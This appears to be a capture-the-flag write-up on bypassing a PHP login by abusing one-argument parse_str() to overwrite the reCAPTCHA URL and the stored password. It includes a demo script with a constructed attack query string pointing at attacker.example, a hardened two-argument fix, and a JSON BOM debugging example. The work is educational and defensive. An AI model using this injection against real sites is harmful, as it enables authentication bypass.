The link above is where you can download the challenges.
This was a pretty interesting challenge. The “vulnerability/feature” that is exploited is the PHP function parse_str(). When it is called with only one argument, the variables parsed from the query string are written straight into the current scope, so an attacker who controls that string can overwrite variables the script has already initialized!
Some StackOverflow discussions also mention that this function now requires two arguments (the one-argument form was deprecated in PHP 7.2, with an E_DEPRECATED notice, and removed in PHP 8.0, where it throws an ArgumentCountError). However, I tested this on my Kali box that was running PHP 7.4 and, surprisingly, it was still working.
Looking at login.php, there are three conditions that we need to bypass:

```php
// login.php (excerpt). $RECAPTCHA_URL, $CORRECT_PASSWORD, $FLAG and $password
// are initialized earlier in the script, before parse_str() is called with a
// single argument, which is what lets the request overwrite them.

// Condition 1: $recaptcha_resp["success"] must be true (and the decode must not fail).
$recaptcha_resp = json_decode(file_get_contents($RECAPTCHA_URL.$_GET['g-recaptcha-response']), true);
if(!$recaptcha_resp || !$recaptcha_resp["success"]) {
    echo "Bad recaptcha :(";
    die();
}

// Condition 2: the score must be at least 0.8 (the check is a strict less-than).
if ($recaptcha_resp["score"] < 0.8) {
    echo "Stop! Big hacker";
    die();
}

// Condition 3: the password check. Note that this is only a double equal (loose comparison).
if($password == $CORRECT_PASSWORD) {
    echo $FLAG;
} else {
    echo "Wrong password :(";
}
```
To get the flag, we need to serve a JSON page with “success” set to true and a “score” of at least 0.8, and send a password equal to $CORRECT_PASSWORD. To control these values, we overwrite $RECAPTCHA_URL (so it points at our fake page) and $CORRECT_PASSWORD by passing them as GET parameters, which parse_str() turns into variables in the script's scope. After serving the fake page, browse to this URL:
And you will get the flag!
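As an added example (my own code, not the challenge's login.php and not any file from the repo above), the following PHP 7 script reproduces the one-argument parse_str() overwrite described above with a constructed query string, and places a hardened version next to it. The shape of the Google verification URL, the placeholder password and flag, the host attacker.example, and the fetch_stub() function that stands in for file_get_contents() so the script runs offline are all assumptions made for this example:

```php
<?php
// Added example written for this write-up; it is not the challenge's login.php
// and not one of the repo's scripts. It reproduces the parse_str() variable
// injection with a constructed query string and shows the two-argument fix.
// Run it with PHP 7.x: the one-argument parse_str() raises E_DEPRECATED on
// 7.2-7.4 (silenced below with @) and is a fatal ArgumentCountError on 8.0+.

// Stand-in for file_get_contents($url), so the example runs offline: our fake
// JSON when the URL is on a host we control, otherwise what the real
// verification endpoint returns for a bogus token. Both bodies are constructed.
function fetch_stub(string $url): string {
    return strpos($url, 'http://attacker.example/') === 0
        ? '{"success": true, "score": 0.9}'
        : '{"success": false, "error-codes": ["invalid-input-response"]}';
}

// Vulnerable shape of login.php. The settings are initialized first, then
// parse_str() with ONE argument dumps every query parameter into this scope,
// so RECAPTCHA_URL=... and CORRECT_PASSWORD=... in the request replace them.
// $token stands for $_GET['g-recaptcha-response'].
function vulnerable_login(string $query_string, string $token): array {
    $RECAPTCHA_URL    = 'https://www.google.com/recaptcha/api/siteverify?secret=SECRET&response='; // assumed shape
    $CORRECT_PASSWORD = 'hunter2';        // placeholder, not the challenge's value
    $FLAG             = 'FLAG{example}';  // placeholder

    @parse_str($query_string);            // <-- the bug: no second argument

    $resp = json_decode(fetch_stub($RECAPTCHA_URL . $token), true);
    if (!$resp || !$resp['success'])  return [$RECAPTCHA_URL, 'Bad recaptcha :('];
    if ($resp['score'] < 0.8)         return [$RECAPTCHA_URL, 'Stop! Big hacker'];
    $password = $password ?? '';          // injected by parse_str() from password=...
    return [$RECAPTCHA_URL, $password == $CORRECT_PASSWORD ? $FLAG : 'Wrong password :('];
}

// Hardened shape: parse into an array, read only the keys you expect, and
// compare the password with hash_equals() (strict and constant-time, so the
// loose == comparison is gone too). The configuration can no longer be touched.
function hardened_login(string $query_string, string $token): array {
    $RECAPTCHA_URL    = 'https://www.google.com/recaptcha/api/siteverify?secret=SECRET&response=';
    $CORRECT_PASSWORD = 'hunter2';
    $FLAG             = 'FLAG{example}';

    parse_str($query_string, $params);    // <-- everything lands in $params only
    $password = (string)($params['password'] ?? '');

    $resp = json_decode(fetch_stub($RECAPTCHA_URL . $token), true);
    if (!is_array($resp) || ($resp['success'] ?? false) !== true) return [$RECAPTCHA_URL, 'Bad recaptcha :('];
    if (($resp['score'] ?? 0) < 0.8)                             return [$RECAPTCHA_URL, 'Stop! Big hacker'];
    return [$RECAPTCHA_URL, hash_equals($CORRECT_PASSWORD, $password) ? $FLAG : 'Wrong password :('];
}

// The attacker's query string (constructed). The trailing "?" on the fake URL
// is my choice: the script appends the g-recaptcha-response value, and this
// way it becomes a harmless query parameter instead of part of the file name.
$attack = 'RECAPTCHA_URL=' . urlencode('http://attacker.example/fake.json?')
        . '&CORRECT_PASSWORD=x&password=x';

[$url, $result] = vulnerable_login($attack, 'anything');
echo "vulnerable: fetched $url -> $result\n";   // the fake URL is fetched and the flag is returned

[$url, $result] = hardened_login($attack, 'anything');
echo "hardened:   fetched $url -> $result\n";   // the real URL is fetched and the bogus token is rejected
```

Save it as a file and run it with the php CLI on a 7.x interpreter. The two calls receive exactly the same request; the only difference is whether parse_str() was given a destination array, which is the whole fix for this class of bug.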
Another thing I noticed was the double equal in the comparison of passwords. I thought it would be possible to exploit the loose type comparison vulnerability in PHP as well. But upon testing, it's not possible because both types are strings.
Another challenge I faced was the json_decode function. Apparently the response/served file must be saved in a certain encoding. I had to transfer it to my host and convert the encoding to ASCII in Notepad++. Some discussions also mentioned that saving it as UTF-8 without BOM(?) would work too.
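The following added example (my own code, not a script from the repo) shows the json_decode() failure mode behind that encoding problem: a UTF-8 byte order mark (EF BB BF) at the start of the served file makes json_decode() return NULL, which the challenge's first check reports as a bad recaptcha. The JSON bodies are constructed inline, and the helper names are mine:

```php
<?php
// Added example, not part of the write-up's repo: it shows why a fake response
// saved with a UTF-8 BOM fails the challenge's first check, and how to see and
// fix that before serving the file. Both bodies are constructed inline.

// Same decode as login.php. json_decode() returns NULL on any syntax error, and
// the script treats NULL as "Bad recaptcha :(", however correct the JSON looks.
function decode_like_login(string $body) {
    return json_decode($body, true);
}

// Describe a body the way you would want to see it while debugging: its first
// three bytes in hex, the decoder's verdict, and the decoded success flag.
function diagnose(string $body): string {
    $decoded = decode_like_login($body);
    $verdict = json_last_error() === JSON_ERROR_NONE ? 'ok' : json_last_error_msg();
    return sprintf('first bytes %s: %s, success=%s',
        bin2hex(substr($body, 0, 3)), $verdict, var_export($decoded['success'] ?? null, true));
}

// Strip a UTF-8 BOM if present. Editors add it when saving as "UTF-8 with
// BOM"; saving as plain UTF-8 or ASCII produces a file without it.
function strip_utf8_bom(string $body): string {
    return substr($body, 0, 3) === "\xEF\xBB\xBF" ? substr($body, 3) : $body;
}

$clean = '{"success": true, "score": 0.9}';
$bom   = "\xEF\xBB\xBF" . $clean;   // the same JSON as written by an editor that prepends a BOM

echo diagnose($clean), "\n";               // decodes
echo diagnose($bom), "\n";                 // syntax error: the BOM is not whitespace to the JSON parser
echo diagnose(strip_utf8_bom($bom)), "\n"; // decodes again once the three bytes are gone
```

The hex dump of the first bytes is the quickest way to tell a BOM apart from a genuinely malformed file: a body that starts with 7b (an opening brace) and still fails to decode has a different problem than one that starts with efbbbf.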
In the repo above, I have updated the testing scripts for the function, as well as the scripts for spoofing the variables.
- fake.js = answer for the solution and test script for captchaTest.php
- legit.js = test script for captchaTest.php
- captchaTest.php = server-side code
- ParseStrTest.php = basic script to test the parse_str function
Main learning point for my workflow:
1) Trace user inputs through the functions that handle them, and Google how those functions treat them